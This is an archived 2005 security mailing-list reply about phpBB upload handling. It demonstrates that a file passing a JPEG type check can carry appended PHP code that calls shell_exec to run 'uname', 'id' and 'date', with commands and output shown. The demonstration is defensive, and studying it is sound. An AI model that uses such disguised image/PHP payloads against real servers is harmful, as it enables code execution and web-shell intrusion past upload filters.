lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <1130419392.9108.54.camel@localhost>
Date: Thu Oct 27 14:28:19 2005
From: nicob at nicob.net (Nicob)
Subject: Re: phpBB 2.0.17 (and other BB systems as well)
	Cookie disclosure exploit.

Le mardi 25 octobre 2005 ? 17:02 -0400, Paul Laudanski a ?crit :
> 
> Anyone have other ideas on this?  I've already implemented some code
> to validate file input and its working.  But is this the right
> approach?

I'm not sure to understand what you're talking about but if you're
trying to positively validate that file XYZ is an image and not a PHP
file, you're asking for trouble :

$> wget http://nicob.net/mirrors/blowjob.jpg

$> file blowjob.jpg 
blowjob.jpg: JPEG image data, JFIF standard 1.0

$> tail -n 5 blowjob.jpg
<?php
$resu = shell_exec("echo '' && echo '' && uname -a && id && date");
echo nl2br($resu);
?>

$> php blowjob.jpg
[garbage] Linux dellyre 2.6.[...] jeu oct 27 15:21:31 CEST 2005 [...]


Nicob

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ